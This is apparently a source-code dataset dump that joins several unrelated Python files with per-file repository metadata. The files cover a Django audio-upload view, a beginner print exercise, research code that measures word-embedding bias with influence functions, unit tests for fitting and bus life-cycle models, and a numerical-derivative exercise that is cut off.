foldername= MEDIA_ROOT+'/transcripts/'+foldername
if not os.path.exists(foldername):
print("not exists")
os.mkdir(foldername)
with open(MEDIA_ROOT+'/'+filename, 'wb+') as destination:
for chunk in file.chunks():
destination.write(chunk)
def meeting(request, *args, **kwargs):
print("hi")
if request.method == "POST":
print("haha")
print(request.FILES['recording'])
recording=upload_audio_path(request,str(request.FILES['recording']))
print(recording)
folder_name, ext=get_filename_ext(recording)
print(folder_name)
handle_uploaded_file(request.FILES['recording'], recording, folder_name)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
filepath=MEDIA_ROOT+'/'+recording
newfilepath=MEDIA_ROOT+'/'
print(filepath)
m=Meeting.objects.get(id=1)
m.recording = filepath # change field
m.save() # this will update only
sttxt(request, filepath,newfilepath,folder_name)
print("hagre")
user=request.user
meeting=Meeting.objects.filter(conductor=request.user)
# print(meeting)
users=User.objects.exclude(username=request.user.username)
# print(users)
ma=[]
for i in meeting:
meetatten=MeetingAttendee.objects.filter(meeting=i)
for j in meetatten:
ma.append(j)
# print(ma)
context={
'datas':'hello',
'meetatten':ma,
}
return render(request, "Analyse/meetings.html", context)
def calenda(request):
if method == 'POST':
agenda = request.POST['agenda']
print(agenda) | 28.053254 | 133 | 0.640793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,476 | 0.261126 |
637cdb4f017832b717342e2928773f70e1670584 | 316 | py | Python | 000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p01st07TASK07_20210205_print.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p01st07TASK07_20210205_print.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p01st07TASK07_20210205_print.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | '''
Напишите программу, которая объявляет переменную: "name" и присваивает ей значение "Python".
Программа должна напечатать в одну строку, разделяя пробелами:
Строку "name"
Значение переменной "name"
Число 3
Число 8.5
Sample Input:
Sample Output:
name Python 3 8.5
'''
name = 'Python'
print('name', name, 3, 8.5)
| 19.75 | 92 | 0.743671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 437 | 0.933761 |
637e1e9bf118d9a1429a4df90953398c25b3dbcc | 24,568 | py | Python | cross_loss_influence/helpers/influence_function.py | CORE-Robotics-Lab/Cross_Loss_Influence_Functions | 6f0fa45f8896cd6c238c143eca6ddebef97b642c | [
"MIT"
] | 1 | 2022-03-08T05:59:17.000Z | 2022-03-08T05:59:17.000Z | cross_loss_influence/helpers/influence_function.py | CORE-Robotics-Lab/Cross_Loss_Influence_Functions | 6f0fa45f8896cd6c238c143eca6ddebef97b642c | [
"MIT"
] | null | null | null | cross_loss_influence/helpers/influence_function.py | CORE-Robotics-Lab/Cross_Loss_Influence_Functions | 6f0fa45f8896cd6c238c143eca6ddebef97b642c | [
"MIT"
] | null | null | null | # Created by Andrew Silva
# Extensions to https://github.com/nimarb/pytorch_influence_functions
import torch
import time
import datetime
import numpy as np
import copy
import logging
from torch.autograd import grad
import random
from cross_loss_influence.helpers.bolukbasi_prior_work.prior_pca_debiasing import extract_txt_embeddings
from torch.utils.data.dataloader import DataLoader
DEVICE = 'cuda'
def calc_influence_single(model, train_dataset, z_test, t_test, recursion_depth, r, test_indices, scifi=True):
"""Calculates the influences of all training data points on a single
test dataset image.
Arugments:
model: pytorch model
train_loader: DataLoader, loads the training dataset
embedding_pair: pair of embeddings we want to diff
recursion_depth: int, number of recursions to perform during s_test
calculation, increases accuracy. r*recursion_depth should equal the
training dataset size.
r: int, number of iterations of which to take the avg.
of the h_estimate calculation; r*recursion_depth should equal the
training dataset size.
Returns:
influence: list of float, influences of all training data samples
for one test sample
harmful: list of float, influences sorted by harmfulness
helpful: list of float, influences sorted by helpfulness
"""
train_loader = DataLoader(train_dataset, shuffle=True)
s_test_vec = calc_s_test_single(model,
z_test,
t_test,
train_loader,
recursion_depth=recursion_depth,
r=r,
test_indices=test_indices,
scifi=scifi)
# Calculate the influence function
train_dataset_size = len(train_dataset)
influences = []
train_loader = DataLoader(train_dataset, shuffle=False)
for index, batch_data in enumerate(train_loader):
good_enough = False # Is a word of interest in this sample?
words, contexts = vectorized_influence_data_to_tensors(batch_data)
for v_index in test_indices:
if v_index in words.cpu():
good_enough = True
if not good_enough:
continue
words = torch.autograd.Variable(words).to(device=DEVICE)
contexts = torch.autograd.Variable(contexts).to(device=DEVICE)
loss_val = model.forward_no_negatives(words, contexts)
grad_z_vec = list(grad(loss_val, list(model.parameters()), create_graph=True))
# For sparse:
if recursion_depth <= 1:
tmp_influence = 0
for k, j in zip(grad_z_vec, s_test_vec):
if (k * j).indices().size(1) > 0:
tmp_influence -= (k * j).values().sum()/train_dataset_size
# For dense
else:
tmp_influence = -sum(
[
####################
# TODO: potential bottle neck, takes 17% execution time
# torch.sum(k * j).data.cpu().numpy()
####################
torch.sum(k * j).data
for k, j in zip(grad_z_vec, s_test_vec)
]) / train_dataset_size
influences.append([index, tmp_influence.cpu()])
influences = np.array(influences)
harmful = influences[influences[:, 1].argsort()]
helpful = harmful[::-1]
influences = influences[:, 1]
return influences, harmful.tolist(), helpful.tolist()
def calc_s_test_single(model, z_test, t_test, train_loader,
damp=0.01, scale=25, recursion_depth=5000, r=1, test_indices=[], scifi=True):
"""Calculates s_test for a single test image taking into account the whole
training dataset. s_test = invHessian * nabla(Loss(test_img, model params))
Arguments:
model: pytorch model, for which s_test should be calculated
z_test: test image
t_test: test image label
train_loader: pytorch dataloader, which can load the train data
damp: float, influence function damping factor
scale: float, influence calculation scaling factor
recursion_depth: int, number of recursions to perform during s_test
calculation, increases accuracy. r*recursion_depth should equal the
training dataset size.
r: int, number of iterations of which to take the avg.
of the h_estimate calculation; r*recursion_depth should equal the
training dataset size.
Returns:
s_test_vec: torch tensor, contains s_test for a single test image"""
s_test_vec_list = []
# For my sparse approach, 1 pass is all we need and we go through the entire dataset to get samples of import.
for i in range(r):
print("Beginning another round of estimation")
s_test_vec_list.append(s_test(z_test, t_test, model, train_loader, damp=damp, scale=scale,
recursion_depth=recursion_depth, test_indices=test_indices, scifi=scifi))
s_test_vec = s_test_vec_list[0]
for i in range(1, r):
s_test_vec += s_test_vec_list[i]
s_test_vec = [i / r for i in s_test_vec if i is not None]
return s_test_vec
def s_test(z_test, t_test, model, train_loader, damp=0.01, scale=25.0,
recursion_depth=5000, test_indices=[], scifi=True):
"""s_test can be precomputed for each test point of interest, and then
multiplied with grad_z to get the desired value for each training point.
Here, strochastic estimation is used to calculate s_test. s_test is the
Inverse Hessian Vector Product.
Arguments:
z_test: torch tensor, test data points, such as test images
t_test: torch tensor, contains all test data labels
model: torch NN, model used to evaluate the dataset
train_loader: torch dataloader, can load the training dataset
damp: float, dampening factor
scale: float, scaling factor
recursion_depth: int, number of iterations aka recursion depth
should be enough so that the value stabilises.
Returns:
h_estimate: list of torch tensors, s_test"""
# v = grad_z(z_test, t_test, model)
if scifi:
v = calc_loss(z_test, t_test) # Change this to bias estimation
else:
v = calc_bias(z_test, t_test, model)
v = list(grad(v, list(model.parameters()), create_graph=True, allow_unused=True)) # A bit sketched by this
# v[1] = v[0]
h_estimates = v.copy()
if recursion_depth <= 1: # If we're sparse
success_limit = 5000
else:
success_limit = recursion_depth
################################
# TODO: Dynamically set the recursion depth so that iterations stops
# once h_estimate stabilises
################################
successes = 0
for i, batch_data in enumerate(train_loader): # instead of random, get all samples of relevance in the dataset.
good_enough = False # Is a word of interest in this sample?
words, contexts = vectorized_influence_data_to_tensors(batch_data)
for v_index in test_indices:
if v_index in words.cpu():
good_enough = True
if not good_enough:
continue
words = torch.autograd.Variable(words).to(device=DEVICE)
contexts = torch.autograd.Variable(contexts).to(device=DEVICE)
loss_val = model.forward_no_negatives(words, contexts)
hv = hvp(loss_val, list(model.parameters()), h_estimates, sparse=recursion_depth == 1)
# Recursively caclulate h_estimate
if not hv:
continue
successes += 1
# h_estimates = [
# _v + (1 - damp) * h_estimate - _hv / scale
# for _v, h_estimate, _hv in zip(v, h_estimates, hv)]
for h_index, bucket in enumerate(zip(v, h_estimates, hv)):
temp_v, h_est, temp_hv = bucket
if h_est is not None:
temp_h_est = temp_v + (1 - damp) * h_est - temp_hv / scale
# print((h_estimates[h_index] - temp_h_est).abs().sum())
h_estimates[h_index] = temp_h_est
# h_estimates[h_index] = temp_v + (1 - damp) * h_est - temp_hv / scale
if successes >= success_limit:
break
return h_estimates
# def grad_z(z, t, model):
# """Calculates the gradient z. One grad_z should be computed for each
# training sample.
# Arguments:
# z: torch tensor, training data points
# e.g. an image sample (batch_size, 3, 256, 256)
# t: torch tensor, training data labels
# model: torch NN, model used to evaluate the dataset
# Returns:
# grad_z: list of torch tensor, containing the gradients
# from model parameters to loss"""
# model.eval()
# # initialize
# z = z.to(device=DEVICE)
# t = t.to(device=DEVICE)
# y = model(z)
# loss = calc_loss(y, t)
# # Compute sum of gradients from model parameters to loss
# return list(grad(loss, list(model.parameters()), create_graph=True))
def calc_bias(target_set, attribute_set, model):
targets_one = target_set[0]
targets_two = target_set[1]
attribute_one = attribute_set[0]
attribute_two = attribute_set[1]
mean_one = torch.zeros(len(targets_one))
mean_two = torch.zeros(len(targets_two))
std_all = torch.zeros(len(targets_one)+len(targets_two))
ind=0
for x, y in zip(targets_one, targets_two):
m1 = similarity_diff(x, attribute_one, attribute_two, model)
m2 = similarity_diff(y, attribute_one, attribute_two, model)
mean_one[ind] = m1
mean_two[ind] = m2
std_all[ind*2] = m1
std_all[ind*2 + 1] = m2
ind += 1
return (mean_one.mean() - mean_two.mean()) / std_all.std()
def similarity_diff(word, attrs_A, attrs_B, model):
cos_attr_one = torch.zeros(len(attrs_A), requires_grad=True)
cos_attr_two = torch.zeros(len(attrs_B), requires_grad=True)
ind = 0
for a_A, a_B in zip(attrs_A, attrs_B):
cos_attr_one[ind] = cos_diff(word, a_A, model)
cos_attr_two[ind] = cos_diff(word, a_B, model)
ind += 1
return cos_attr_one.mean() - cos_attr_two.mean()
def cos_diff(x, y, model):
return torch.nn.functional.cosine_similarity(model.predict(x), model.predict(y))
def calc_loss(y, t):
"""Calculates the loss
Arguments:
y: torch tensor, input with size (minibatch, nr_of_classes)
t: torch tensor, target expected by loss of size (0 to nr_of_classes-1)
Returns:
loss: scalar, the loss"""
loss = torch.nn.functional.mse_loss(y, t, reduction='mean') # TODO: Test cosine loss... but clustering doesn't use that
return loss
def hvp(ys, xs, v, sparse=False):
"""Multiply the Hessians of y and w by v.
Uses a backprop-like approach to compute the product between the Hessian
and another vector efficiently, which even works for large Hessians.
Example: if: y = 0.5 * w^T A x then hvp(y, w, v) returns and expression
which evaluates to the same values as (A + A.t) v.
Arguments:
y: scalar/tensor, for example the output of the loss function
w: list of torch tensors, tensors over which the Hessian
should be constructed
v: list of torch tensors, same shape as w,
will be multiplied with the Hessian
Returns:
return_grads: list of torch tensors, contains product of Hessian and v.
Raises:
ValueError: `y` and `w` have a different length."""
if len(xs) != len(v):
raise(ValueError("xs and v must have the same length."))
# First backprop
first_grads = grad(ys, xs, create_graph=True) # , retain_graph=True, create_graph=True)
# Elementwise products
elemwise_products = 0
for grad_elem, v_elem in zip(first_grads, v):
if not sparse:
if grad_elem is not None and v_elem is not None:
elemwise_products += torch.sum(grad_elem * v_elem.detach())
else:
if (grad_elem*v_elem).indices().size(1) > 0:
elemwise_products += (grad_elem * v_elem).values().sum()
# Second backprop
if elemwise_products == 0:
return False
return_grads = grad(elemwise_products, xs) # , create_graph=True)
return return_grads
def vectorized_influence_data_to_tensors(batch_data_in):
# np_batch = np.array(batch_data_in)
# all_words = torch.tensor(np_batch[:, 0].tolist(), dtype=torch.long, device=DEVICE).view(-1)
# all_contexts = torch.tensor(np_batch[:, 1].tolist(), dtype=torch.long, device=DEVICE).view(-1)
all_words = torch.tensor([x[0] for x in batch_data_in], dtype=torch.long, device=DEVICE).view(-1)
all_contexts = torch.tensor([x[1] for x in batch_data_in], dtype=torch.long, device=DEVICE).view(-1)
return all_words, all_contexts
def load_skipgram(fn, device):
checkpoint = torch.load(os.path.join(MODEL_SAVE_DIR, PROJECT_NAME, 'checkpoints', fn), map_location='cpu')
vocab_size = checkpoint['model_data']['u_embeddings.weight'].size(0)
embed_dim = checkpoint['model_data']['u_embeddings.weight'].size(1)
sparse = checkpoint['model_data']['u_embeddings.weight'].is_sparse
model = SkipGramModel(vocab_size=vocab_size, embedding_dim=embed_dim, sparse=sparse).to(device=device)
model.load_state_dict(checkpoint['model_data'])
return model
def load_prior_work_embeddings(model, fn):
embeds, words = extract_txt_embeddings(fn)
model.u_embeddings.weight.data = torch.from_numpy(embeds).float().to(DEVICE)
return model
def explain_embed_pos(word='mandalorians',
model_name='DENSE_scifi_window-3_negatives-5',
data_fn='all_scripts_numericalized_dataset.pkl',
vocab_fn='all_scripts_stoi.pkl',
window_size=5,
r=1,
recursion_depth=500):
dataset = InfluenceMedDataset(data_dir=DATA_DIR,
filename=data_fn,
window_size=window_size)
stoi = pickle.load(open(os.path.join(DATA_DIR, vocab_fn), 'rb'))
all_keys = []
all_values = []
for key, val in stoi.items():
all_keys.append(key)
all_values.append(val)
mando_ind = torch.tensor([all_values[all_keys.index(word)]], dtype=torch.long).to(device=DEVICE)
# checkpoint = torch.load(os.path.join(MODEL_SAVE_DIR, PROJECT_NAME, 'checkpoints',
# 'DENSE_medkd_window-5_negatives-10_last_checkpoint.pth.tar'), map_location='cpu')
model = load_skipgram(model_name+'_init_checkpoint.pth.tar', device)
model.eval()
mando_init = model.predict(mando_ind)
model = load_skipgram(model_name+'_last_checkpoint.pth.tar', device)
model.eval()
mando_final = model.predict(mando_ind)
test_index = mando_ind.item()
# If in sparse, r = 1. else r = 120 ??
# If in sparse, recursion_depth = 1, else recursion_depth = 10000 ??
influence, harmful, helpful = calc_influence_single(model=model,
train_dataset=dataset,
z_test=mando_final, t_test=mando_init,
recursion_depth=recursion_depth,
r=r,
test_indices=[test_index],
scifi=True)
return influence, harmful, helpful, dataset, all_keys
def explain_bias(test='math',
model_name='DENSE_biased_window-10_negatives-10_60_checkpoint.pth.tar',
data_fn='biased_data_numericalized_dataset.pkl',
vocab_fn='biased_data_stoi.pkl',
window_size=10,
recursion_depth=5000,
r=10,
other_embeds=None):
dataset = InfluenceMedDataset(data_dir=DATA_DIR,
filename=data_fn,
window_size=window_size)
stoi = pickle.load(open(os.path.join(DATA_DIR, vocab_fn), 'rb'))
all_keys = []
for key, val in stoi.items():
all_keys.append(key)
if test == 'math':
A = ['math', 'algebra', 'geometry', 'calculus', 'equations', 'computation', 'numbers', 'addition']
B = ['poetry', 'art', 'dance', 'literature', 'novel', 'symphony', 'drama', 'sculpture']
X = ['male', 'man', 'boy', 'brother', 'he', 'him', 'his', 'son']
Y = ['female', 'woman', 'girl', 'sister', 'she', 'her', 'hers', 'daughter']
elif test == 'science':
A = ['science', 'technology', 'physics', 'chemistry', 'einstein', 'nasa', 'experiment', 'astronomy']
B = ['poetry', 'art', 'shakespeare', 'dance', 'literature', 'novel', 'symphony', 'drama']
X = ['brother', 'father', 'uncle', 'grandfather', 'son', 'he', 'his', 'him']
Y = ['sister', 'mother', 'aunt', 'grandmother', 'daughter', 'she', 'her', 'hers']
elif test == 'career':
X = ['john', 'paul', 'mike', 'kevin', 'steve', 'greg', 'jeff', 'bill']
Y = ['amy', 'joan', 'lisa', 'sarah', 'diana', 'kate', 'ann', 'donna']
A = ['executive', 'management', 'professional', 'corporation', 'salary', 'office', 'business', 'career']
B = ['home', 'parents', 'children', 'family', 'cousins', 'marriage', 'wedding', 'relatives']
elif test == 'race':
A = ['freedom', 'health', 'love', 'peace', 'cheer', 'friend', 'heaven', 'loyal', 'pleasure', 'diamond',
'gentle', 'honest', 'lucky', 'diploma', 'gift', 'honor', 'miracle', 'sunrise', 'family',
'happy', 'laughter', 'vacation']
B = ['crash', 'murder', 'sickness', 'accident', 'death', 'grief', 'poison', 'stink',
'assault', 'disaster', 'hatred', 'tragedy', 'bomb', 'divorce', 'jail', 'poverty', 'ugly',
'cancer', 'evil', 'kill', 'rotten', 'vomit']
X = ['josh', 'alan', 'ryan', 'andrew', 'jack', 'greg', 'amanda', 'katie', 'nancy', 'ellen']
Y = ['theo', 'jerome', 'leroy', 'lamar', 'lionel', 'malik', 'tyrone', 'ebony', 'jasmine', 'tia', ]
x_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in X]
y_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in Y]
a_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in A]
b_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in B]
test_indices = np.unique(x_embed+y_embed+a_embed+b_embed).tolist()
model = load_skipgram(model_name, device)
x_embed = [x.to(device=DEVICE) for x in x_embed]
y_embed = [x.to(device=DEVICE) for x in y_embed]
a_embed = [x.to(device=DEVICE) for x in a_embed]
b_embed = [x.to(device=DEVICE) for x in b_embed]
z_test = [x_embed, y_embed]
t_test = [a_embed, b_embed]
if other_embeds is not None:
model = load_prior_work_embeddings(model, other_embeds)
influence, harmful, helpful = calc_influence_single(model=model,
train_dataset=dataset,
z_test=z_test, t_test=t_test,
recursion_depth=recursion_depth,
r=r,
test_indices=test_indices,
scifi=False)
return influence, harmful, helpful, dataset, all_keys
def write_out_results(influences, harmfuls, helpfuls, dataset, keys, file_prefix=''):
f1 = os.path.join(DATA_DIR, file_prefix+"test_results.txt")
with open(f1, 'w') as f:
f.write(f"Influences: {influences}")
f.write('\n')
f.write(f"Harmful: {harmfuls}")
f.write('\n')
f.write(f"Helpful: {helpfuls}")
f.write('\n')
f2 = os.path.join(DATA_DIR, file_prefix+'harmful_ordered.txt')
for h in harmfuls:
bad_indices = np.array(dataset.get_raw_sample(int(h[0])))
b_ws = ''
for index in range(len(bad_indices)):
try:
b_ws += keys[bad_indices[index]]
b_ws += ' '
except:
continue
with open(f2, 'a', encoding='utf-8') as f:
f.write(str(b_ws))
f.write('\n')
f3 = os.path.join(DATA_DIR, file_prefix+'helpful_ordered.txt')
for h in helpfuls:
good_indices = np.array(dataset.get_raw_sample(int(h[0])))
g_ws = ''
for index in range(len(good_indices)):
try:
g_ws += keys[good_indices[index]]
g_ws += ' '
except:
continue
with open(f3, 'a', encoding='utf-8') as f:
f.write(str(g_ws))
f.write('\n')
if __name__ == "__main__":
# TEST THIS STUFF
from cross_loss_influence.models.skip_gram_word2vec import SkipGramModel
from cross_loss_influence.data.scripts.my_pytorch_dataset import InfluenceMedDataset
from cross_loss_influence.config import DATA_DIR, MODEL_SAVE_DIR, PROJECT_NAME
import pickle
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--base", help="biased or neutral", type=str, default='biased')
parser.add_argument("-t", "--test", help="test? ['career', 'science', 'math', 'race']", type=str, default='career')
parser.add_argument("-m", "--model_name", help="Model name to investigate", type=str, required=True)
parser.add_argument("-w", "--word", help="Word for the scifi tests", type=str)
args = parser.parse_args()
original = args.base
test_name = args.test
model_name = args.model_name
word = args.word
# start_time = time.time()
w_s = 3
device = DEVICE
rec = 10 # 1
r_depth = 5000 # 1
if test_name == 'scifi':
rec = 1
r_depth = 5000
assert len(word) > 0, "-w or --word must be passed in"
i_out, harm_out, help_out, dset, keyset = explain_embed_pos(word=word,
model_name=model_name,
data_fn='all_scripts_numericalized_dataset.pkl',
vocab_fn='all_scripts_stoi.pkl',
window_size=w_s,
r=rec,
recursion_depth=r_depth)
write_out_results(i_out, harm_out, help_out, dset, keyset,
file_prefix=f'{test_name}_{original}_influence_scifi')
else:
prior_work_fn = None
if 'bolukbasi' in model_name:
prior_work_fn = model_name
model_name = model_name.split('original_')[-1].split('_debiased')[0]
# prior_work_fn = os.path.join(DATA_DIR, f'bolukbasi_original_{model_name}_debiased.txt')
print(f"Beginning influence estimation on {original} embeddings with {test_name} WEAT")
i_out, harm_out, help_out, dset, keyset = explain_bias(test=test_name,
model_name=model_name,
data_fn=f'{original}_data_numericalized_dataset.pkl',
vocab_fn='biased_data_stoi.pkl',
window_size=10,
recursion_depth=r_depth,
r=rec,
other_embeds=prior_work_fn)
file_prefix = ''
if 'bolukbasi' in model_name:
file_prefix += 'bolukbasi_'
file_prefix += f'{test_name}_{original}_{model_name}_influence_'
write_out_results(i_out, harm_out, help_out, dset, keyset,
file_prefix=file_prefix)
| 46.26742 | 124 | 0.591379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,921 | 0.363115 |
637fe0e94faeee830062160453c7c20c39eeaafb | 6,189 | py | Python | tests/test_rtfit_dumps.py | ndraeger/rt1 | 8cf30a3b3604b78b1422388e479b28c921d01c09 | [
"Apache-2.0"
] | null | null | null | tests/test_rtfit_dumps.py | ndraeger/rt1 | 8cf30a3b3604b78b1422388e479b28c921d01c09 | [
"Apache-2.0"
] | null | null | null | tests/test_rtfit_dumps.py | ndraeger/rt1 | 8cf30a3b3604b78b1422388e479b28c921d01c09 | [
"Apache-2.0"
] | null | null | null | """
Test the fits-module by loading a dumped rtfits result and performing
all actions again
"""
import unittest
import numpy as np
import cloudpickle
import matplotlib.pyplot as plt
import copy
import os
class TestDUMPS(unittest.TestCase):
def setUp(self):
self.sig0_dB_path = os.path.dirname(__file__) + os.sep + "sig0_dB.dump"
self.sig0_linear_path = os.path.dirname(__file__) + os.sep + "sig0_linear.dump"
def load_data(self, path):
with open(path, 'rb') as file:
fit = cloudpickle.load(file)
return fit
# self.assertTrue(
# err < errdict[key],
# msg='derived error' + str(err) + 'too high for ' + str(key))
def test_rtplots(self):
for path, msg in zip([self.sig0_dB_path, self.sig0_linear_path],
['dB', 'linear']):
print(f'testing plotfunctions for {msg} fit')
fit = self.load_data(path)
# call performfit to re-initialize _fnevals functions
# and evaluate intermediate results
# (they might have been removed if symeninge has been used)
fit.lsq_kwargs['verbose'] = 0
fit.performfit(intermediate_results=True,
print_progress=True)
# get list of available plot-methods
method_list = [func for func in dir(fit.plot) if
callable(getattr(fit.plot, func)) and not func.startswith("__")]
for function_name in method_list:
print(f'... {function_name}')
if function_name == 'printsig0analysis':
# check 'dataset' index slider
f, s1, s2 = fit.plot.__getattribute__(function_name)(
range2=2, range1=1, use_index='dataset')
# check update functions
s1.set_val(1)
s2.set_val(1)
plt.close(f)
# check 'groups' index slider
f, s1, s2 = fit.plot.__getattribute__(function_name)(
range2=2, range1=1, use_index='groups')
# check update functions
s1.set_val(1)
s2.set_val(1)
plt.close(f)
elif function_name == 'analyzemodel':
f, sliders, txt_but = fit.plot.__getattribute__(
function_name)()
# check update functions
for key, s in sliders.items():
s.set_val((s.valmax - s.valmin)/2.)
for key, b in txt_but.items():
if key == 'buttons':
# the initial status is ALL OFF
stat = b.get_status()
for i in range(len(stat)):
b.set_active(i)
# now all should be ON
self.assertTrue(np.all(b.get_status()))
for i in range(len(stat)):
b.set_active(i)
# now all should be OFF again
self.assertTrue(~np.all(b.get_status()))
else:
# set the boundaries of the parameters
if 'min' in key:
b.set_val(0.02)
if 'max' in key:
b.set_val(0.99)
plt.close(f)
elif function_name == 'intermediate_residuals':
# check default (e.g. pandas datetime-offset)
f = fit.plot.__getattribute__(function_name)(fmt='%d.%b %Y')
plt.close(f)
# check grouping with respect to incidence angles and
# convert the labels to degrees
f = fit.plot.__getattribute__(function_name)(
grp=('inc', 10),
label_formatter=lambda x,y:round(np.rad2deg(x),2))
plt.close(f)
# check grouping with respect to datetimes
f = fit.plot.__getattribute__(function_name)(grp='groups')
plt.close(f)
# check grouping with respect to the dataset index
f = fit.plot.__getattribute__(function_name)(
grp='dataset', plottype='2D', fmt='%Y %b %d (%H:%M)')
plt.close(f)
else:
f = fit.plot.__getattribute__(function_name)()
plt.close(f)
def test_performfit(self):
for path, msg in zip([self.sig0_dB_path, self.sig0_linear_path],
['dB', 'linear']):
print(f'testing plotfunctions for {msg} fit')
fit = self.load_data(path)
old_results = fit.res_dict
# print model definition
fit.model_definition
print('testing performfit')
fit.lsq_kwargs['verbose'] = 0
fit.performfit(intermediate_results=True,
print_progress=True)
# call _cache_info() to make coveralls happy
fit._cache_info()
fit.R._cache_info()
# try to dump the file again (without fit-details)
fit.dump(os.path.join(os.path.dirname(__file__), 'testdump1.dump'),
mini=True)
# try to dump the file again (with fit-details)
fit.dump(os.path.join(os.path.dirname(__file__), 'testdump2.dump'),
mini=False)
for key, val in old_results.items():
self.assertTrue(np.allclose(fit.res_dict[key],
old_results[key], atol=1e-4, rtol=1e-4),
msg=f'fitted values for {msg} fit of {key} ' +
f'differ by {np.subtract(fit.res_dict[key], old_results[key]).mean()}')
if __name__ == "__main__":
unittest.main() | 40.45098 | 108 | 0.487801 | 5,932 | 0.958475 | 0 | 0 | 0 | 0 | 0 | 0 | 1,545 | 0.249636 |
637feac03a2aafd17dc15fa959b7227bdea86a08 | 3,234 | py | Python | tests/test_bus_model.py | romainsacchi/carculator_bus | 5db105db4223b2f58509fa19b1fccafa16313458 | [
"BSD-3-Clause"
] | 1 | 2021-05-31T08:43:06.000Z | 2021-05-31T08:43:06.000Z | tests/test_bus_model.py | romainsacchi/carculator_bus | 5db105db4223b2f58509fa19b1fccafa16313458 | [
"BSD-3-Clause"
] | 2 | 2021-05-27T09:21:52.000Z | 2021-06-09T21:35:26.000Z | tests/test_bus_model.py | romainsacchi/carculator_bus | 5db105db4223b2f58509fa19b1fccafa16313458 | [
"BSD-3-Clause"
] | 1 | 2021-05-31T08:43:12.000Z | 2021-05-31T08:43:12.000Z | import numpy as np
from carculator_bus import *
tip = BusInputParameters()
tip.static()
_, array = fill_xarray_from_input_parameters(tip)
tm = BusModel(array, country="CH")
tm.set_all()
def test_presence_PHEVe():
# PHEV-e should be dropped
assert "PHEV-e" not in tm.array.powertrain.values.tolist()
def test_ttw_energy_against_VECTO():
# The TtW energy consumption of a 13m city bus diesel must be
# within an interval given by VECTO
vecto_empty, vecto_full = (8300, 13700)
assert (
vecto_empty
<= tm.array.sel(
powertrain="ICEV-d",
year=2020,
size="13m-city",
parameter="TtW energy",
value=0,
)
<= vecto_full
)
# The fuel cell stack mass must be in a given interval
def test_auxiliary_power_demand():
# The auxilliary power demand must be lower for combustion trucks
assert np.all(
tm.array.sel(
powertrain="ICEV-d", year=2020, parameter="auxiliary power demand", value=0
)
< tm.array.sel(
powertrain="BEV-opp", year=2020, parameter="auxiliary power demand", value=0
)
)
def test_battery_replacement():
# Battery replacements cannot be lower than 0
assert np.all(tm["battery lifetime replacements"] >= 0)
def test_cargo_mass():
# Cargo mass cannot be superior to available payload
assert np.all(tm["curb mass"] <= tm["driving mass"])
# Cargo mass must equal the available payload * load factor
# assert np.allclose((tm["available payload"] * tm["capacity utilization"]), tm["total cargo mass"])
def test_electric_utility_factor():
# Electric utility factor must be between 0 and 1
assert 0 <= np.all(tm["electric utility factor"]) <= 1
def test_fuel_blends():
# Shares of a fuel blend must equal 1
for fuel in tm.fuel_blend:
np.testing.assert_array_equal(
np.array(tm.fuel_blend[fuel]["primary"]["share"])
+ np.array(tm.fuel_blend[fuel]["secondary"]["share"]),
[1, 1, 1, 1, 1, 1],
)
# a_matrix fuel cannot be specified both as primary and secondary fuel
for fuel in tm.fuel_blend:
assert (
tm.fuel_blend[fuel]["primary"]["type"]
!= tm.fuel_blend[fuel]["secondary"]["type"]
)
def test_battery_mass():
# Battery mass must equal cell mass and BoP mass
with tm("BEV-opp") as cpm:
assert np.allclose(
cpm["energy battery mass"],
cpm["battery cell mass"] + cpm["battery BoP mass"],
)
# Cell mass must equal capacity divided by energy density of cells
with tm("BEV-depot") as cpm:
assert np.allclose(
cpm["battery cell mass"],
cpm["electric energy stored"] / cpm["battery cell energy density"],
)
def test_noise_emissions():
# Noise emissions of a city bus must only affect urban area
tm = BusModel(array, country="CH")
tm.set_all()
list_comp = ["rural", "suburban"]
params = [
p
for p in tm.array.parameter.values
if "noise" in p and any([x in p for x in list_comp])
]
assert tm.array.sel(size="13m-city", parameter=params).sum() == 0
| 28.368421 | 104 | 0.624613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,268 | 0.392084 |
6380b2f2030ee551fa4870964c341464ca8bdcf7 | 2,828 | py | Python | Ej-Lab8-MoisesSanjurjo-UO270824/ejercicio2-MoisesSanjurjo-UO270824.py | moiSS00/CN | 1e30b43ee2167d15fbc8c472ff9637c2b920c3d4 | [
"MIT"
] | null | null | null | Ej-Lab8-MoisesSanjurjo-UO270824/ejercicio2-MoisesSanjurjo-UO270824.py | moiSS00/CN | 1e30b43ee2167d15fbc8c472ff9637c2b920c3d4 | [
"MIT"
] | null | null | null | Ej-Lab8-MoisesSanjurjo-UO270824/ejercicio2-MoisesSanjurjo-UO270824.py | moiSS00/CN | 1e30b43ee2167d15fbc8c472ff9637c2b920c3d4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Ejercicio 2: Aproximación numérica de orden 1 y de orden 2 de la
derivada de la función f(x) = 1/x.
"""
import numpy as np
import matplotlib.pyplot as plt
# Función f(x)= 1/x y su derivada f'
f = lambda x:1/x # función f
df = lambda x:(-1)/x**2 # derivada exacta f'
#---------------------------------------------------------------
# Derivación numérica de orden 1
#---------------------------------------------------------------
h = 0.01 # paso
a = 0.2 # extremo inferior del intervalo
